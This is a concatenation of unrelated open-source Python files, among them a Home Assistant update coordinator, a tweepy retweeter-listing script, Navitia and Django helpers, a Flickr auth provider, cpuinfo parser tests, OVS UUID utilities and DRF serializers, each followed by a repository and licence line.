        self._unsub_refresh = None
        await self.async_refresh()

    async def async_request_refresh(self) -> None:
        """Request a refresh.

        Refresh will wait a bit to see if it can batch them.
        """
        await self._debounced_refresh.async_call()

    async def _async_update_data(self) -> Optional[T]:
        """Fetch the latest data from the source.

        Subclasses may override this instead of passing update_method.
        """
        if self.update_method is None:
            raise NotImplementedError("Update method not implemented")
        return await self.update_method()

    async def async_refresh(self) -> None:
        """Refresh data.

        Errors are logged only on the first failure of an outage and a
        recovery message is logged when fetching succeeds again.  A new
        refresh is scheduled afterwards while listeners exist.
        """
        # Cancel any pending scheduled/debounced refresh; this run covers it.
        if self._unsub_refresh:
            self._unsub_refresh()
            self._unsub_refresh = None

        self._debounced_refresh.async_cancel()

        try:
            start = monotonic()
            self.data = await self._async_update_data()

        except (asyncio.TimeoutError, requests.exceptions.Timeout):
            if self.last_update_success:
                self.logger.error("Timeout fetching %s data", self.name)
                self.last_update_success = False

        except (aiohttp.ClientError, requests.exceptions.RequestException) as err:
            if self.last_update_success:
                self.logger.error("Error requesting %s data: %s", self.name, err)
                self.last_update_success = False

        except urllib.error.URLError as err:
            if self.last_update_success:
                if err.reason == "timed out":
                    self.logger.error("Timeout fetching %s data", self.name)
                else:
                    self.logger.error("Error requesting %s data: %s", self.name, err)
                self.last_update_success = False

        except UpdateFailed as err:
            if self.last_update_success:
                self.logger.error("Error fetching %s data: %s", self.name, err)
                self.last_update_success = False

        except NotImplementedError as err:
            # Misconfiguration (no update method): propagate to the caller.
            raise err

        except Exception as err:  # pylint: disable=broad-except
            # Unexpected errors get a full traceback every time.
            self.last_update_success = False
            self.logger.exception(
                "Unexpected error fetching %s data: %s", self.name, err
            )

        else:
            if not self.last_update_success:
                self.last_update_success = True
                self.logger.info("Fetching %s data recovered", self.name)

        finally:
            self.logger.debug(
                "Finished fetching %s data in %.3f seconds",
                self.name,
                monotonic() - start,
            )
            if self._listeners:
                self._schedule_refresh()

        # Notify listeners regardless of success so they can re-render
        # availability.
        for update_callback in self._listeners:
            update_callback()
class CoordinatorEntity(entity.Entity):
    """A class for entities using DataUpdateCoordinator.

    The entity does not poll; it registers as a coordinator listener and
    re-renders its state whenever the coordinator refreshes.
    """

    def __init__(self, coordinator: DataUpdateCoordinator) -> None:
        """Create the entity with a DataUpdateCoordinator."""
        self.coordinator = coordinator

    @property
    def should_poll(self) -> bool:
        """No need to poll. Coordinator notifies entity of updates."""
        return False

    @property
    def available(self) -> bool:
        """Return if entity is available.

        Mirrors the success/failure of the coordinator's last refresh.
        """
        return self.coordinator.last_update_success

    async def async_added_to_hass(self) -> None:
        """When entity is added to hass."""
        await super().async_added_to_hass()
        # Unsubscribe automatically when the entity is removed.
        self.async_on_remove(
            self.coordinator.async_add_listener(self.async_write_ha_state)
        )

    async def async_update(self) -> None:
        """Update the entity.

        Only used by the generic entity update service.
        """
        # Ignore manual update requests if the entity is disabled
        if not self.enabled:
            return

        await self.coordinator.async_request_refresh()
| tchellomello/home-assistant | homeassistant/helpers/update_coordinator.py | Python | apache-2.0 | 7,578 |
#!/usr/bin/env python
import os
import sys
import time
import tweepy
from tweepy import Cursor
from tweepy.binder import bind_api
from config import CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN, ACCESS_TOKEN_SECRET
class SkippableAPI(tweepy.API):
    """Override the create_block function so that it accepts
    the 'skip_status' option (ie. don't return the user from the command,
    so that it returns faster."""

    @property
    def create_block(self):
        """ :reference: https://dev.twitter.com/rest/reference/post/blocks/create
            :allowed_param:'id', 'user_id', 'screen_name', 'skip_status'
        """
        # Same endpoint as tweepy's stock create_block, but with
        # 'skip_status' added to the accepted parameters.
        return bind_api(
            api=self,
            path='/blocks/create.json',
            method='POST',
            payload_type='user',
            allowed_param=['id', 'user_id', 'screen_name', 'skip_status'],
            require_auth=True)

    @property
    def blocks_ids(self):
        """ :reference: https://dev.twitter.com/rest/reference/get/blocks/ids
            :allowed_param:'cursor'"""
        # Returns the raw JSON payload of blocked user ids (GET by default).
        return bind_api(
            api=self,
            path='/blocks/ids.json',
            payload_type='json',
            allowed_param=['cursor'],
            require_auth=True)
# Check parameters: usage is
#   python bad_tweet.py <mute|block> <tweet url>
print(sys.argv)
if len(sys.argv) != 3:
    print("Bad tweet needs two values, the action and the url of the bad tweet.")
    print("Something like:")
    print(" $ python bad_tweet.py mute https://twitter.com/idiot/status/1234567890123456")
    sys.exit(1)

action = sys.argv[-2]
if action not in ('mute', 'block'):
    print("The first argument to bad tweet needs to be either 'mute' or 'block'")
    sys.exit(2)

# Loose sanity check that the second argument looks like a tweet URL.
bad_tweet_url = sys.argv[-1]
if (not bad_tweet_url.startswith('http') or
        'twitter.com' not in bad_tweet_url or
        'status' not in bad_tweet_url):
    print("The second argument doesn't seem to be a tweet url")
    sys.exit(3)

# API setup
# wait on rate limit means wait if we're rate limited, ie. don't error out
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = SkippableAPI(
    auth_handler=auth,
    wait_on_rate_limit=True,
    wait_on_rate_limit_notify=True)

# Find our account, build a whitelist of our followers so we don't mute them
# (disabled: the block below is a string literal, i.e. dead code kept for
# reference; it also still uses Python 2 print syntax)
"""
me = api.me()
whitelist = [me.id_str]
for followed in Cursor(api.friends).items():
    whitelist.append(followed.id_str)
print "You are following %d people" % len(whitelist)
print whitelist
"""

# The tweet id is the last path segment of the URL.
bad_tweet_id = bad_tweet_url.split('/')[-1]
print(bad_tweet_id)
#for retweet in api.retweets(id=bad_tweet_id, trim_user=1, count=100):
#    print retweet.author.id
# List everyone who retweeted the offending tweet.
# NOTE(review): despite the 'mute'/'block' argument, no mute/block call is
# made here yet -- the script currently only prints the retweeter ids.
for retweeter in api.retweeters(id=bad_tweet_id):
    print(retweeter)
| AnthonyBriggs/Python-101 | bad_tweet/bad_tweet.py | Python | mit | 2,749 |
# -*- coding: utf-8 -*-
"""The Formatter Test Data model class."""
from plasoscaffolder.model import base_data_model
from plasoscaffolder.model import sql_query_model
class FormatterTestDataModel(base_data_model.BaseDataModel):
  """Data model backing the formatter test template."""

  def __init__(self,
               plugin_name: str,
               queries: [sql_query_model.SQLQueryModel]):
    """Initialises the formatter test data model.

    Args:
      plugin_name (str): the name of the plugin.
      queries (list[sql_query_model.SQLQueryModel]): the SQL queries for
          the plugin.
    """
    super().__init__(plugin_name)
    self.queries = queries
| ClaudiaSaxer/PlasoScaffolder | src/plasoscaffolder/model/formatter_test_data_model.py | Python | apache-2.0 | 640 |
# Palladium service configuration for the R "iris" example.  Each '!' key
# names the component class to instantiate for that slot.
{
    # Identification reported by the running service.
    'service_metadata': {
        'service_name': 'iris',
        'service_version': '0.1',
    },
    # Training and test data both come from the 'dataset' function in iris.R.
    'dataset_loader_train': {
        '!': 'palladium.R.DatasetLoader',
        'scriptname': 'iris.R',
        'funcname': 'dataset',
    },
    'dataset_loader_test': {
        '!': 'palladium.R.DatasetLoader',
        'scriptname': 'iris.R',
        'funcname': 'dataset',
    },
    # R randomForest classifier; class labels are encoded before training.
    'model': {
        '!': 'palladium.R.ClassificationModel',
        'scriptname': 'iris.R',
        'funcname': 'train.randomForest',
        'encode_labels': True,
    },
    # Fitted models are persisted to a local SQLite database with caching.
    'model_persister': {
        '!': 'palladium.persistence.CachedUpdatePersister',
        'impl': {
            '!': 'palladium.persistence.Database',
            'url': 'sqlite:///iris-model.db',
        },
    },
    # Maps incoming request parameters (name, type) to model features.
    'predict_service': {
        '!': 'palladium.server.PredictService',
        'mapping': [
            ('sepal length', 'float'),
            ('sepal width', 'float'),
            ('petal length', 'float'),
            ('petal width', 'float'),
        ],
    },
}
| ottogroup/palladium | examples/R/config-iris.py | Python | apache-2.0 | 1,050 |
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from navitiacommon import request_pb2, type_pb2
class Kraken(object):
    """Thin client for an instance's Kraken backend (protobuf requests)."""

    def __init__(self, instance):
        self.instance = instance

    def get_stop_points(self, place, mode, max_duration, reverse=False):
        """Return {stop_point uri: access duration} reachable from *place*.

        Speeds for every mode are taken from the instance configuration.
        """
        req = request_pb2.Request()
        req.requested_api = type_pb2.nearest_stop_points
        # Alias the sub-message to avoid repeating the full path below.
        params = req.nearest_stop_points
        params.place = place
        params.mode = mode
        params.reverse = reverse
        params.max_duration = max_duration
        params.walking_speed = self.instance.walking_speed
        params.bike_speed = self.instance.bike_speed
        params.bss_speed = self.instance.bss_speed
        params.car_speed = self.instance.car_speed
        response = self.instance.send_and_receive(req)
        return {item.stop_point.uri: item.access_duration
                for item in response.nearest_stop_points}

    def place(self, place):
        """Resolve a place uri and return the first matching place object."""
        req = request_pb2.Request()
        req.requested_api = type_pb2.place_uri
        req.place_uri.uri = place
        response = self.instance.send_and_receive(req)
        return response.places[0]
| TeXitoi/navitia | source/jormungandr/jormungandr/georef.py | Python | agpl-3.0 | 2,419 |
# Copyright (c) 2001-2019, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
class EquipmentsProviderMock(object):
    """Test double for an equipments provider.

    Only records the configuration it was built with; extra keyword
    arguments are accepted and ignored.
    """

    def __init__(self, url, timeout=2, **kwargs):
        self.timeout = timeout
        self.url = url
| pbougue/navitia | source/jormungandr/jormungandr/equipments/tests/equipment_provider_mock.py | Python | agpl-3.0 | 1,421 |
# PopGen 1.1 is A Synthetic Population Generator for Advanced
# Microsimulation Models of Travel Demand
# Copyright (C) 2009, Arizona State University
# See PopGen/License
import adjusting_pums_joint_distribution
import numpy
def ipf_config_run(db, synthesis_type, control_variables, dimensions, pumano, tract, bg):
    """Return (objective_frequency, estimated_constraint) for one geography.

    Builds the objective joint distribution for the tract/block-group, then
    rebuilds it with zero-cell / zero-marginal corrections, reading the
    frequency column back from the database after each pass.
    """
    apjd = adjusting_pums_joint_distribution
    cursor = db.cursor()
    freq_query = ('select frequency from %s_%s_joint_dist where tract = %s '
                  'and bg = %s order by %s')

    # Objective joint distribution to match the synthetic population against.
    apjd.create_joint_dist(db, synthesis_type, control_variables, dimensions, pumano, tract, bg)
    apjd.adjust_weights(db, synthesis_type, control_variables, pumano, tract, bg)
    order_dummy = apjd.create_aggregation_string(control_variables)
    cursor.execute(freq_query % (synthesis_type, pumano, tract, bg, order_dummy))
    objective_frequency = numpy.asarray(cursor.fetchall())

    # Joint distribution corrected for zero-cell and zero-marginal problems
    # (e.g. puma x composite_type adjustment for the given synthesis type).
    apjd.create_joint_dist(db, synthesis_type, control_variables, dimensions, pumano, tract, bg)
    apjd.create_adjusted_frequencies(db, synthesis_type, control_variables, pumano, tract, bg)
    apjd.adjust_weights(db, synthesis_type, control_variables, pumano, tract, bg)
    cursor.execute(freq_query % (synthesis_type, pumano, tract, bg, order_dummy))
    estimated_constraint = numpy.asarray(cursor.fetchall())
    return objective_frequency, estimated_constraint
| christianurich/VIBe2UrbanSim | 3rdparty/opus/src/synthesizer/command_line_algorithm/ipf.py | Python | gpl-2.0 | 1,792 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
from django.shortcuts import render, redirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.conf import settings
from workup.models import ClinicDate
from pttrack.models import Patient
def dashboard_dispatch(request):
    """Redirect an incoming user to the dashboard for their provider type.

    Falls back to the default dashboard url when the type has no entry.
    """
    provider_type = request.session['clintype_pk']
    dashboards = settings.OSLER_PROVIDERTYPE_DASHBOARDS
    target = dashboards.get(provider_type, settings.OSLER_DEFAULT_DASHBOARD)
    return redirect(target)
def dashboard_attending(request):
    """Render the attending dashboard.

    Shows a paginated list of the attending's clinic days plus the most
    recently added patients who still have no workup note.
    """
    attending = request.user.provider
    clinic_days = ClinicDate.objects.filter(workup__attending=attending)
    paginator = Paginator(clinic_days, settings.OSLER_CLINIC_DAYS_PER_PAGE,
                          allow_empty_first_page=True)
    requested_page = request.GET.get('page')
    try:
        clinics = paginator.page(requested_page)
    except PageNotAnInteger:
        # Non-numeric page requests fall back to the first page.
        clinics = paginator.page(1)
    except EmptyPage:
        # Out-of-range page requests (e.g. 9999) get the last page.
        clinics = paginator.page(paginator.num_pages)
    # The 20 most recently created patients without any workup.
    no_note_patients = Patient.objects.filter(workup=None).order_by('-pk')[:20]
    context = {
        'clinics': clinics,
        'no_note_patients': no_note_patients,
    }
    return render(request, 'dashboard/dashboard-attending.html', context)
| SaturdayNeighborhoodHealthClinic/osler | dashboard/views.py | Python | gpl-3.0 | 1,655 |
import json
from flickrapi import FlickrAPI
from djpcms.contrib.social import OAuthProvider
DEFAULT_FLICKR_PERMISSION = 'read'
class Flickr(OAuthProvider):
    """Social-auth provider for Flickr.

    Flickr's (legacy) auth flow is frob/token based rather than standard
    OAuth: there is no request-token step, and the 'frob' handed back to
    the callback is exchanged for an access token.
    """
    AUTHORIZATION_URL = 'http://www.flickr.com/services/auth/'
    def extra_request_parameters(self):
        # Requested permission level; defaults to 'read'.
        perms = getattr(self.settings,'FLICKR_PERMISSION',DEFAULT_FLICKR_PERMISSION)
        return {'perms':perms}
    def fetch_request_token(self, callback, **kwargs):
        # Flickr's flow has no request-token step.
        return None
    def fetch_authentication_uri(self, rtoken, **kwargs):
        # Sign the request parameters with the api key/secret pair and build
        # the url the user is redirected to for authorisation.
        api = FlickrAPI(*self.tokens)
        params = self.extra_request_parameters()
        params['api_key'] = self.tokens[0]
        data = api.encode_and_sign(params)
        return '{0}?{1}'.format(self.authorisation_url(**kwargs),data)
    def quick_access_token(self, data):
        """Exchange the callback's 'frob' for an access-token dict."""
        api = self._get_api()
        frob = data.get('frob',None)
        res = api.auth_getToken(frob=frob)
        # Flickr wraps JSON in a 14-char function prefix plus trailing ')'
        # (presumably 'jsonFlickrApi(...)' — confirm); strip before parsing.
        res = json.loads(res[14:-1])
        return res['auth']
    def get_access_token_key(self, access_token):
        # The token string lives under Flickr's '_content' wrapper.
        return access_token['token']['_content']
    def user_data(self, access_token):
        """Return (person payload, token key, '') for the authenticated user."""
        token = self.get_access_token_key(access_token)
        uuid = access_token['user']['nsid']
        api = self.authenticated_api(token)
        # Same jsonFlickrApi(...) wrapper stripping as in quick_access_token.
        res = json.loads(api.people_getInfo(user_id = uuid)[14:-1])
        return res,token,''
    def authenticated_api(self, key, secret = None):
        # 'secret' is unused: Flickr only needs the auth token.
        return self._get_api(token = key)
    def _get_api(self, token = None):
        # Always request JSON responses from flickrapi.
        kwargs = {'format':'json','token':token}
        return FlickrAPI(*self.tokens, **kwargs)
    def get_user_details(self, response):
        """Normalise Flickr's 'person' payload into the common user dict."""
        response = response['person']
        name = response['realname']['_content']
        return {'uid': response['nsid'],
                'email': '',
                'username': response['username']['_content'],
                'fullname': name,
                'first_name': name,
                'description': '',
                'location': response['location']['_content'],
                'url': response['profileurl']['_content']}
| strogo/djpcms | djpcms/contrib/social/providers/flickr.py | Python | bsd-3-clause | 2,116 |
class Solution:
    """LeetCode 'Find Peak Element': return the index of any local maximum.

    Fixes over the original: the leftover Python-2 debug ``print`` in
    ``findPeak`` is removed, and ``//`` replaces ``/`` so the midpoint stays
    an int under Python 3 (under Python 2 behaviour is unchanged).
    """

    # @param num, a list of integer (non-empty)
    # @return an integer
    def findPeakElement(self, num):
        """Return an index whose element is greater than both neighbours."""
        last = len(num) - 1
        if last == 0:
            return 0
        # The ends only need one comparison each.
        if num[0] > num[1]:
            return 0
        if num[last] > num[last - 1]:
            return last
        return self.findPeak(num, 0, last)

    def findPeak(self, num, left, right):
        """Recursively search the open interval (left, right); -1 if no peak."""
        if right - left < 2:
            return -1
        center = (left + right) // 2  # floor division: valid index in py2 and py3
        if num[center] > num[center - 1] and num[center] > num[center + 1]:
            return center
        found = self.findPeak(num, left, center)
        if found >= 0:
            return found
        # Either the right half yields a peak or -1 propagates up.
        return self.findPeak(num, center, right)
if __name__ == "__main__":
s = Solution()
tests = [(1,), (1, 2, 3, 1, 4), (1, 2, 3)]
for test in tests:
print s.findPeakElement(test)
| Crayzero/LeetCodeProgramming | Solutions/Find Peak Element/FindPeakElement.py | Python | mit | 979 |
"""Module for unittesting dmidecode methods"""
import unittest
from hwinfo.host.cpuinfo import CPUInfoParser
DATA_DIR = 'hwinfo/host/tests/data'
class CPUInfoParserTests(unittest.TestCase):
    """Verify CPUInfoParser on a single /proc/cpuinfo processor stanza."""
    # Raw capture of one processor entry from /proc/cpuinfo.
    DATA = """
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 30
model name : Intel(R) Xeon(R) CPU X3430 @ 2.40GHz
stepping : 5
microcode : 0x3
cpu MHz : 2394.052
cache size : 8192 KB
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu de tsc msr pae mce cx8 apic sep mca cmov pat clflush acpi mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl nonstop_tsc pni monitor vmx est ssse3 cx16 sse4_1 sse4_2 popcnt hypervisor lahf_lm dtherm tpr_shadow vnmi flexpriority ept vpid
bogomips : 4788.10
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
"""
    # Expected parse: keys lower-cased with spaces turned into underscores
    # (e.g. 'cpu family' -> 'cpu_family'), values stripped of whitespace.
    DATA_REC = {
        'processor': '0',
        'vendor_id': 'GenuineIntel',
        'cpu_family': '6',
        'model': '30',
        'model_name': 'Intel(R) Xeon(R) CPU X3430 @ 2.40GHz',
        'stepping': '5',
        'microcode': '0x3',
        'cpu_mhz': '2394.052',
        'cache_size': '8192 KB',
        'fpu': 'yes',
        'fpu_exception': 'yes',
        'cpuid_level': '11',
        'wp': 'yes',
        'flags': 'fpu de tsc msr pae mce cx8 apic sep mca cmov pat clflush acpi mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl nonstop_tsc pni monitor vmx est ssse3 cx16 sse4_1 sse4_2 popcnt hypervisor lahf_lm dtherm tpr_shadow vnmi flexpriority ept vpid',
        'bogomips': '4788.10',
        'clflush_size': '64',
        'cache_alignment': '64',
        'address_sizes': '36 bits physical, 48 bits virtual',
        'power_management': '',
    }
    def setUp(self):
        # Fresh parser per test, fed the fixture without its outer newlines.
        self.parser = CPUInfoParser(self.DATA.strip())
    def _assert_equal(self, key):
        # Compare one field of the first (only) parsed record to DATA_REC.
        rec = self.parser.parse_items()[0]
        return self.assertEqual(rec[key], self.DATA_REC[key])
    # One test per cpuinfo field so a failure pinpoints the broken key.
    def test_cpuinfo_processor(self):
        return self._assert_equal('processor')
    def test_vendor_id(self):
        return self._assert_equal('vendor_id')
    def test_cpu_family(self):
        return self._assert_equal('cpu_family')
    def test_model(self):
        return self._assert_equal('model')
    def test_model_name(self):
        return self._assert_equal('model_name')
    def test_stepping(self):
        return self._assert_equal('stepping')
    def test_microcode(self):
        return self._assert_equal('microcode')
    def test_cpu_mhz(self):
        return self._assert_equal('cpu_mhz')
    def test_cache_size(self):
        return self._assert_equal('cache_size')
    def test_fpu(self):
        return self._assert_equal('fpu')
    def test_fpu_exception(self):
        return self._assert_equal('fpu_exception')
    def test_cpuid_level(self):
        return self._assert_equal('cpuid_level')
    def test_wp(self):
        return self._assert_equal('wp')
    def test_flags(self):
        return self._assert_equal('flags')
    def test_bogomips(self):
        return self._assert_equal('bogomips')
    def test_clflush_size(self):
        return self._assert_equal('clflush_size')
    def test_cache_alignment(self):
        return self._assert_equal('cache_alignment')
    def test_address_sizes(self):
        return self._assert_equal('address_sizes')
class CPUInfoMultipleParseTest(unittest.TestCase):
    """Parse a captured /proc/cpuinfo containing several processor stanzas."""

    DATA_FILE = "%s/cpuinfo" % DATA_DIR

    def setUp(self):
        # Use a context manager so the file handle is closed even if read()
        # raises (the original leaked the handle on failure).
        with open(self.DATA_FILE) as fh:
            data = fh.read()
        self.parser = CPUInfoParser(data)

    def test_number_of_processors(self):
        # The sample capture describes exactly four logical processors.
        recs = self.parser.parse_items()
        self.assertEqual(len(recs), 4)
| Revolution1/ohei | ohei/utils/hwinfo/host/tests/test_cpuinfo.py | Python | mit | 3,733 |
# Copyright (c) 2009, 2010, 2011, 2016 Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import uuid
import six
from six.moves import range
from ovs.db import error
import ovs.db.parser
# Matches the canonical 8-4-4-4-12 hexadecimal textual UUID form.
_UUID_PATTERN = ("^xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx$"
                 .replace('x', '[0-9a-fA-F]'))
uuidRE = re.compile(_UUID_PATTERN)


def zero():
    """Return the all-zeros UUID."""
    return uuid.UUID(int=0)


def is_valid_string(s):
    """Return True if *s* is a well-formed textual UUID."""
    return bool(uuidRE.match(s))
def from_string(s):
    """Parse *s* into a uuid.UUID, raising error.Error on malformed input."""
    if is_valid_string(s):
        return uuid.UUID(s)
    raise error.Error("%s is not a valid UUID" % s)
def from_json(json, symtab=None):
    """Parse an OVSDB JSON uuid.

    *json* is normally the ["uuid", "<text>"] form (cf. to_json below).  If
    that fails and a *symtab* dict is supplied, a ["named-uuid", "<name>"]
    form is accepted instead: unknown names get a fresh random UUID which is
    remembered in *symtab*, so later references to the same name resolve to
    the same UUID.  Raises error.Error for anything else.
    """
    try:
        s = ovs.db.parser.unwrap_json(json, "uuid", six.string_types, "string")
        if not uuidRE.match(s):
            raise error.Error("\"%s\" is not a valid UUID" % s, json)
        return uuid.UUID(s)
    except error.Error as e:
        if not symtab:
            raise e
        try:
            name = ovs.db.parser.unwrap_json(json, "named-uuid",
                                             six.string_types, "string")
        except error.Error:
            # Not a named-uuid either: report the original parse error.
            raise e
        if name not in symtab:
            symtab[name] = uuid.uuid4()
        return symtab[name]
def to_json(uuid_):
    """Render *uuid_* in its OVSDB JSON form: ["uuid", "<text>"]."""
    return ["uuid", "%s" % uuid_]
def to_c_initializer(uuid_, var):
    """Return a C array-initializer fragment for *uuid_*'s 128 bits.

    The value is rendered as four 32-bit hex words.  *var* is unused but
    kept for interface compatibility with callers.
    """
    words = ["0x" + uuid_.hex[i:i + 8] for i in range(0, 32, 8)]
    return "{ %s }," % ", ".join(words)
| ejschiller/FLEX | ovs/python/ovs/ovsuuid.py | Python | gpl-3.0 | 1,929 |
#!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example updates a product's notes.
To determine which products exist, run get_all_products.py.
"""
# Import appropriate modules from the client library.
from googleads import dfp
PRODUCT_ID = 'INSERT_PRODUCT_ID_HERE'
def main(client, product_id):
  """Sets a review note on the DFP product identified by *product_id*.

  Args:
    client: an initialised dfp.DfpClient.
    product_id: the id of the product to update.
  """
  # Initialize appropriate service.
  product_service = client.GetService('ProductService', version='v201502')
  # Create statement object to select a single product by an ID.
  values = [{
      'key': 'id',
      'value': {
          'xsi_type': 'NumberValue',
          'value': product_id
      }
  }]
  query = 'WHERE id = :id'
  # Limit of 1: ids are unique, so at most one product matches.
  statement = dfp.FilterStatement(query, values, 1)
  # Get products by statement.
  response = product_service.getProductsByStatement(statement.ToStatement())
  if 'results' in response:
    # Update each local product object by changing its notes.
    updated_products = []
    for product in response['results']:
      product['notes'] = 'Product needs further review before activation.'
      updated_products.append(product)
    # Update products remotely.
    products = product_service.updateProducts(updated_products)
    # Display results.
    if products:
      for product in products:
        print ('Product with id \'%s\', name \'%s\', and '
               'notes \'%s\' was updated.'
               % (product['id'], product['name'], product['notes']))
    else:
      print 'No products were updated.'
  else:
    print 'No products found to update.'
if __name__ == '__main__':
  # Initialize client object.  LoadFromStorage() reads credentials from the
  # default googleads storage file — NOTE(review): confirm googleads.yaml is
  # configured before running this example.
  dfp_client = dfp.DfpClient.LoadFromStorage()
  main(dfp_client, PRODUCT_ID)
| richardfergie/googleads-python-lib | examples/dfp/v201502/product_service/update_products.py | Python | apache-2.0 | 2,221 |
#! /usr/bin/env python
########################################################################
# File : dirac-admin-kill-pilot
# Author : A.T.
########################################################################
"""
Kill the specified pilot
"""
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
# Build the usage message from the module docstring's first content line.
Script.setUsageMessage('\n'.join([__doc__.split('\n')[1],
                                  'Usage:',
                                  ' %s <pilot reference>' % Script.scriptName]))
Script.parseCommandLine(ignoreErrors=True)
args = Script.getPositionalArgs()
if len(args) < 1:
  # NOTE(review): assumes Script.showHelp() exits the script; otherwise
  # args[0] below would raise IndexError — confirm against DIRAC docs.
  Script.showHelp()
pilotRef = args[0]
# Imported here, after parseCommandLine, presumably so the DIRAC
# configuration is initialised first — verify before moving to file top.
from DIRAC.Interfaces.API.DiracAdmin import DiracAdmin
diracAdmin = DiracAdmin()
exitCode = 0
result = diracAdmin.killPilot(pilotRef)
if not result['OK']:
  # Report the failure and exit non-zero.
  DIRAC.gLogger.error('Failed to kill pilot', pilotRef)
  DIRAC.gLogger.error(result['Message'])
  exitCode = 1
DIRAC.exit(exitCode)
| andresailer/DIRAC | WorkloadManagementSystem/scripts/dirac-admin-kill-pilot.py | Python | gpl-3.0 | 937 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Posix Status Module.
Module that implements the Abstract Status class for the posix
archive backend type.
"""
from ..abstract.status import AbstractStatus
class PosixStatus(AbstractStatus):
    """Status information for files in the posix archive backend.

    Posix storage has exactly one level ('disk'), so the mtime/ctime pair,
    the per-level byte counts and the file size fully describe a file.
    """

    # The only media type a posix backend ever reports.
    _disk = 'disk'

    def __init__(self, mtime, ctime, bytes_per_level, filesize):
        """Record timestamps, per-level byte counts and the file size."""
        super(PosixStatus, self).__init__(
            mtime,
            ctime,
            bytes_per_level,
            filesize
        )
        self.mtime = mtime
        self.ctime = ctime
        self.bytes_per_level = bytes_per_level
        self.filesize = filesize
        self.filepath = None
        # The level layout is fixed for posix, so both derived attributes
        # can be computed eagerly at construction time.
        self.defined_levels = self.define_levels()
        self.file_storage_media = self.find_file_storage_media()

    def find_file_storage_media(self):
        """Return the file's storage media: always the first (disk) level."""
        return self.defined_levels[0]

    def define_levels(self):
        """Return the media type per level; posix only has 'disk'."""
        return [self._disk]

    def set_filepath(self, filepath):
        """Record the path this status object describes."""
        self.filepath = filepath
| dmlb2000/pacifica-archiveinterface | pacifica/archiveinterface/backends/posix/status.py | Python | lgpl-3.0 | 1,478 |
import base64
import imghdr
import six
import uuid
from django.core.files.base import ContentFile
from rest_framework import serializers
from .models import Scholar, Record
class ScholarSerializer(serializers.ModelSerializer):
    """REST serializer exposing a scholar's identity and enrolment fields."""
    class Meta:
        model = Scholar
        fields = (
            'pk',
            'photo',
            'name',
            'sex',
            'birth_date',
            'school_class',
            'is_studying')
class RecordSerializer(serializers.ModelSerializer):
    """REST serializer for a scholar's per-day record (arrival/departure)."""
    class Meta:
        model = Record
        fields = (
            'pk',
            'scholar',
            'date',
            'has_came_with',
            'time_arrived',
            'time_departed'
        )
| mxmaslin/Test-tasks | django_test_tasks/old_django_test_tasks/apps/playschool/serializers.py | Python | gpl-3.0 | 721 |
# -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
